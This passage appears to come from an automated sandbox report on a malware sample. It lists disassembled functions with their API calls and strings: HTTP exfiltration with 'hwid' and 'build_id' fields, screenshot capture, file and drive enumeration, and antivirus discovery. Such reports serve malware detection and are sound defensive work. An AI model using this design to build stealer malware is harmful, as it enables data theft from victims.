                                                                                                                                                                                                            control_flow_graph 2430 404420-404512 call 40fd40 call 404350 call 40fd00 * 5 call 40ffa0 InternetOpenA StrCmpCA 2447 404514 2430->2447 2448 40451b-40451d 2430->2448 2447->2448 2449 404523-4046a1 call 411330 call 40fe30 call 40fde0 call 40fd80 * 2 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fe30 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fe30 call 40fde0 call 40fd80 * 2 InternetConnectA 2448->2449 2450 404a88-404b17 InternetCloseHandle call 411260 * 2 call 40fd80 * 8 2448->2450 2449->2450 2521 4046a7-4046df HttpOpenRequestA 2449->2521 2522 4046e5-4046e9 2521->2522 2523 404a7b-404a85 InternetCloseHandle 2521->2523 2524 404701-404a13 call 40fec0 call 40fde0 call 40fd80 call 40fe30 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fe30 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fe30 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fec0 call 40fde0 call 40fd80 call 40fe30 call 40fde0 call 40fd80 call 40fd00 call 40fe30 * 2 call 40fde0 call 40fd80 * 2 call 40ffa0 lstrlenA call 40ffa0 * 2 lstrlenA call 40ffa0 HttpSendRequestA InternetReadFile 2522->2524 2525 4046eb-4046fb InternetSetOptionA 2522->2525 2523->2450 2636 404a15-404a1a 2524->2636 2637 404a69-404a76 InternetCloseHandle call 40fd80 2524->2637 2525->2524 2636->2637 2639 404a1c-404a67 call 40fec0 call 40fde0 call 40fd80 InternetReadFile 2636->2639 2637->2523 2639->2636 2639->2637
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043A2
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043AF
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043BC
                                                                                                                                                                                                              • Part of subcall function 00404350: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043D6
                                                                                                                                                                                                              • Part of subcall function 00404350: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043E6
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044EA
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00CBF2F0,?,?,?,?,?,?,00000000), ref: 0040450A
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404694
                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,00CBF430,?,00CC2020,00000000,00000000,-00400100,00000000), ref: 004046D5
                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004046FB
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcpy.KERNEL32(00000000), ref: 0040FE93
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcat.KERNEL32(?,00000000), ref: 0040FE9F
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,0041FC79,?,?,?,004266D5,00000000,0041FC79,?,00000000,0041FC79,",00000000,0041FC79,build_id), ref: 004049CA
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004049E3
                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004049F4
                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,000007CF,00000000), ref: 00404A0B
                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,00000000,000007CF,00000000), ref: 00404A5F
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00404A6A
                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00404A7F
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00404A89
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$FileHttpOpenReadRequestlstrcat$ConnectCrackOptionSend
                                                                                                                                                                                                            • String ID: !$"$"$------$------$------$build_id$hwid
                                                                                                                                                                                                            • API String ID: 1585128682-3346224549
                                                                                                                                                                                                            • Opcode ID: 7e77909d369ff23390b66b2c1c0a55fa93edd3cdc226cd01363bbdb91e00dacd
                                                                                                                                                                                                            • Instruction ID: 540040ae5db021ac1ceb2748d5c4312c2132e119d28ee710346708452e1b8a3a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e77909d369ff23390b66b2c1c0a55fa93edd3cdc226cd01363bbdb91e00dacd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5224071801148EADB15E7E4C956BEEBBB8AF18304F54407EE502735C2DA786B0DCBB9
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00417420 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 198stringfileCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcat$wsprintf$FileFindFirstMatchPathSpec
                                                                                                                                                                                                            • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                            • API String ID: 3088078853-445461498
                                                                                                                                                                                                            • Opcode ID: 3044edace3d66a566a08ac136cf183317d3688d4c78237b0a5341c6dc46e137c
                                                                                                                                                                                                            • Instruction ID: 12ea916c1adaa27e1340fb646383f47d9ec8f319673c5f72218ba0863b6e3de9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3044edace3d66a566a08ac136cf183317d3688d4c78237b0a5341c6dc46e137c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E7192B1904218ABCB10DFA5DC45FEEB779BF48704F00459DFA09A3190DB789A48CFA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00411BF0 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 211windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 00411C2B
                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00411CAA
                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00411CB7
                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00411CBE
                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00411CC7
                                                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411CD8
                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00411CE3
                                                                                                                                                                                                            • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411D03
                                                                                                                                                                                                            • GlobalFix.KERNEL32(000000FF), ref: 00411D7D
                                                                                                                                                                                                            • GlobalSize.KERNEL32(000000FF), ref: 00411D8A
                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00411E09
                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00411E27
                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00411E2E
                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00411E36
                                                                                                                                                                                                            • CloseWindow.USER32(00000000), ref: 00411E3D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Object$Window$CompatibleCreateDeleteGlobalSelect$BitmapCloseDesktopRectReleaseSizememset
                                                                                                                                                                                                            • String ID: image/jpeg
                                                                                                                                                                                                            • API String ID: 1311022706-3785015651
                                                                                                                                                                                                            • Opcode ID: 12ac212962b4e69a776be02aeccd12016039083394c140acfc14bd114214da0c
                                                                                                                                                                                                            • Instruction ID: eb041990374060efb8edf9df18418b2220a8f6da5a406505c119ae68c6bcbe01
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 12ac212962b4e69a776be02aeccd12016039083394c140acfc14bd114214da0c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5713DB5900218AFDB10DFE4DD49BEEBBB9EF49704F10412EF906A3290D7785A05CBA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00416BC0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 155stringfileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00416BFB
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 00416C12
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,004274EC), ref: 00416C4C
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,004274F0), ref: 00416C66
                                                                                                                                                                                                            • lstrcat.KERNEL32(?,00CBF420), ref: 00416CA4
                                                                                                                                                                                                            • lstrcat.KERNEL32(?,00CBF350), ref: 00416CB8
                                                                                                                                                                                                            • lstrcat.KERNEL32(?,?), ref: 00416CCC
                                                                                                                                                                                                            • lstrcat.KERNEL32(?,?), ref: 00416CDA
                                                                                                                                                                                                            • lstrcat.KERNEL32(?,004274F4), ref: 00416CEC
                                                                                                                                                                                                            • lstrcat.KERNEL32(?,?), ref: 00416D00
                                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 00416DA1
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcat$FileFind$FirstNextwsprintf
                                                                                                                                                                                                            • String ID: %s\%s
                                                                                                                                                                                                            • API String ID: 111849568-4073750446
                                                                                                                                                                                                            • Opcode ID: cedc9245a540a8e5ca2ba1d9b70716d56ad63cc4c2637645758a6d0557cc82f8
                                                                                                                                                                                                            • Instruction ID: f38a64dbce7e8a8beef62f38cc1a88a4312ba1ffc7a908df938f1b5462539def
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cedc9245a540a8e5ca2ba1d9b70716d56ad63cc4c2637645758a6d0557cc82f8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8851A3B5900218ABCB14EBA0DD49FEE777CAF49714F00459EFA15A3180D7789748CBA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 004110C0 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 136comCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,AV: ,00000000,?,00427260,00000000,?,00000000,00000000), ref: 004110E3
                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427260), ref: 004110F4
                                                                                                                                                                                                            • CoCreateInstance.OLE32(00427B4C,00000000,00000001,00427A7C,?,?,00000000,?,AV: ,00000000,?,00427260,00000000,?,00000000,00000000), ref: 0041110E
                                                                                                                                                                                                            • CoSetProxyBlanket.OLE32(`rB,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427260,00000000), ref: 00411147
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004111A2
                                                                                                                                                                                                              • Part of subcall function 004114D0: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,004111CB,?,?,00000000,?,AV: ,00000000,?,00427260,00000000,?,00000000), ref: 004114D8
                                                                                                                                                                                                              • Part of subcall function 004114D0: CharToOemW.USER32(?,00000000), ref: 004114E5
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004111DD
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InitializeVariant$AllocBlanketCharClearCreateInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                                            • String ID: Select * From AntiVirusProduct$Unknown$Unknown$WQL$`rB$displayName$root\SecurityCenter2
                                                                                                                                                                                                            • API String ID: 685420537-116389011
                                                                                                                                                                                                            • Opcode ID: 5a421c3ac71d2ed07e39480a8fa2bba3d581ad46e7b03bc0cd556845a921006a
                                                                                                                                                                                                            • Instruction ID: afb663f272a1b003384813049a78f8183dc2ca659c98f31d7ffd103b6e15ab0a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a421c3ac71d2ed07e39480a8fa2bba3d581ad46e7b03bc0cd556845a921006a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC415D71A01225BBCB20DF95DC45FEFBB78EF49B50F10425AF615A7280C6789A05CBE8
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00401120 Relevance: 21.8, APIs: 8, Strings: 4, Instructions: 801fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00423334,?,0040203B,?,00423330,?,00000000,00000000,?,00000000), ref: 00401386
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00423338,?,00000000), ref: 004013FC
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,0042333C,?,00000000), ref: 00401416
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00423348,?,?,?,00423344,?,0040203B,?,00423340,?,00000000), ref: 00401543
                                                                                                                                                                                                              • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,viB,00000000,00000000,?,00000000), ref: 00411588
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcpy.KERNEL32(00000000), ref: 0040FE93
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcat.KERNEL32(?,00000000), ref: 0040FE9F
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 00411330: GetSystemTime.KERNEL32(?,00CBE790,004270B8,?,00000000,00000008,?,?,00000000,00421951,000000FF,?,0040452E,0041FC79,00000014), ref: 00411385
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                              • Part of subcall function 00406D60: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000), ref: 00406D97
                                                                                                                                                                                                              • Part of subcall function 00406D60: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DAD
                                                                                                                                                                                                              • Part of subcall function 00406D60: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DC8
                                                                                                                                                                                                              • Part of subcall function 00406D60: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DE1
                                                                                                                                                                                                              • Part of subcall function 00406D60: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406E09
                                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,L3B,?,?,?,?,?,0042334C,?,00000000), ref: 00401817
                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,0042334C,?,00000000), ref: 00401826
                                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,?,?,00000000), ref: 00401B74
                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,00000000), ref: 00401B83
                                                                                                                                                                                                              • Part of subcall function 004152B0: Sleep.KERNEL32(000003E8,00422461, cA,?,?,?,00000001), ref: 00415375
                                                                                                                                                                                                              • Part of subcall function 004152B0: CreateThread.KERNEL32(00000000,00000000,00413CE0,?,00000000,00000000), ref: 00415396
                                                                                                                                                                                                              • Part of subcall function 004152B0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004153A2
                                                                                                                                                                                                              • Part of subcall function 004114F0: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421A38,000000FF,?,0040E60A,?,00000000,00000000,00000000,?,?), ref: 00411517
                                                                                                                                                                                                              • Part of subcall function 00406D60: LocalFree.KERNEL32(?,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406E01
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Find$lstrcpy$Close$CreateFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                            • String ID: %$; @4$L3B$\*.*
                                                                                                                                                                                                            • API String ID: 2707319931-3712019551
                                                                                                                                                                                                            • Opcode ID: 8d8b1722d0a93b20f26faa18e1bdba33531ebe40c6e8ed6c8ef6976dffe1411d
                                                                                                                                                                                                            • Instruction ID: 0df1bf05cc5e90886655044883d132076d365a8f40e634f669c0cf3d233309d1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d8b1722d0a93b20f26faa18e1bdba33531ebe40c6e8ed6c8ef6976dffe1411d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48725E70811248EACB15EBE5C955BDDBBB85F29308F5440BEE906732C2EB781B4CCB65
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 004167B0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 177stringCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00416829
                                                                                                                                                                                                            • memset.MSVCRT ref: 0041684E
                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(00000000,?,?,00000004), ref: 00416857
                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 00416876
                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 00416894
                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 004168B7
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0041691E
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcpy$Drive$LogicalStringsTypelstrlenmemset
                                                                                                                                                                                                            • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                                                            • API String ID: 1884655365-147700698
